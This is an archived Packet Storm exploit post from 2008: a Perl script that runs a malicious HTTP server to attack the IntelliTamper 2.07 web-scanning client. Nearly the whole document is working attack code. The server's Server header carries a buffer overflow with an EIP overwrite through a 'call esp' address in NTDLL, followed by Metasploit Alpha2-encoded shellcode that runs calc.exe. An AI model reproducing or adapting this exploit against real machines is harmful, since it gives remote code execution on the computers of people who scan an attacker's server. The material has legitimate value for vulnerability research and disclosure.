intellitamper207-exec.txt

2008-07-23T00:00:00
ID PACKETSTORM:68445
Type packetstorm
Reporter koshi
Modified 2008-07-23T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# IntelliTamper 2.07 Remote Code Execution ( server header )  
#  
# By: Koshi  
#  
# Guido Landi finally did it, thought i'd throw one in there.  
# This example assumes you're scanning "http://127.0.0.1"  
# For example, exploit may not work if you were to scan "http://127.0.0.1:80"  
# or even changing it as slightly as "http://127.0.0.1/"  
#  
# gr33tz: Rima my baby, str0ke, messiah, Idol, old venny ;) , BU,  
# and finally, Guido Landi for sparking my interest in exploiting  
# this application.  
#  
#  
  
use IO::Socket;  
  
my $msg="";  
my $overflow = "A"x1536;  
my $fun = "".  
"\xb3\x8d\x95\x7c". # EIP (0x7C958DB3 call esp NTDLL.DLL)  
"z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C". # More buffer.  
"AAAA2Cb3Cb4CBBBB"; # Starts executing here  
  
  
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com  
my $sh3llcode =  
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".  
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63".  
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32".  
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x4b\x59\x59\x6c\x6a".  
"\x48\x70\x44\x35\x50\x65\x50\x73\x30\x6e\x6b\x33\x75\x75\x6c\x4c".  
"\x4b\x71\x6c\x53\x35\x74\x38\x55\x51\x78\x6f\x6e\x6b\x62\x6f\x36".  
"\x78\x6c\x4b\x53\x6f\x65\x70\x36\x61\x6a\x4b\x43\x79\x6e\x6b\x76".  
"\x54\x4e\x6b\x53\x31\x68\x6e\x64\x71\x6f\x30\x5a\x39\x4e\x4c\x6e".  
"\x64\x6f\x30\x71\x64\x75\x57\x78\x41\x38\x4a\x74\x4d\x76\x61\x4f".  
"\x32\x5a\x4b\x39\x64\x75\x6b\x43\x64\x67\x54\x74\x44\x74\x35\x48".  
"\x65\x6c\x4b\x73\x6f\x37\x54\x57\x71\x38\x6b\x70\x66\x6e\x6b\x64".  
"\x4c\x70\x4b\x4e\x6b\x33\x6f\x35\x4c\x64\x41\x38\x6b\x4c\x4b\x37".  
"\x6c\x4c\x4b\x76\x61\x58\x6b\x6c\x49\x43\x6c\x55\x74\x56\x64\x4f".  
"\x33\x44\x71\x4f\x30\x30\x64\x6c\x4b\x77\x30\x74\x70\x6f\x75\x49".  
"\x50\x50\x78\x36\x6c\x4c\x4b\x33\x70\x54\x4c\x6e\x6b\x30\x70\x45".  
"\x4c\x6e\x4d\x4c\x4b\x55\x38\x43\x38\x78\x6b\x44\x49\x6e\x6b\x4b".  
"\x30\x6c\x70\x45\x50\x65\x50\x75\x50\x4c\x4b\x41\x78\x75\x6c\x51".  
"\x4f\x30\x31\x7a\x56\x51\x70\x30\x56\x4f\x79\x38\x78\x6c\x43\x6b".  
"\x70\x71\x6b\x72\x70\x61\x78\x4a\x50\x4d\x5a\x43\x34\x43\x6f\x43".  
"\x58\x4c\x58\x49\x6e\x6c\x4a\x66\x6e\x43\x67\x69\x6f\x48\x67\x43".  
"\x53\x73\x51\x50\x6c\x41\x73\x66\x4e\x70\x65\x72\x58\x71\x75\x37".  
"\x70\x63";  
  
my $overflow2 = "A"x1046;  
my $buff = "$overflow$fun$sh3llcode";  
my $resp = "".  
"HTTP/1.1 200 OK\r\n".  
"Connection: close\r\n".  
"Content-Length: 8\r\n".  
"Date: Mon, 21 Jul 2008 20:47:05 GMT\r\n".  
"Content-Type: text/plain\r\n".  
"Server: $buff\r\n".  
"MIME-Version: 1.0\r\n\r\n".  
"Exploit!\r\n";  
  
my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, );  
  
  
print "Listening on port 80 for connections...\n";  
my $new_sock = $sock->accept();  
print "Got connection from client...\n";  
my $sock_addr = recv($new_sock,$msg,190,0);  
print "Sending client packet...\n";  
print $new_sock "$resp";  
print "Packet sent to client, voila?\n";  
close($sock);  
print "Socket closed\n";  
  
`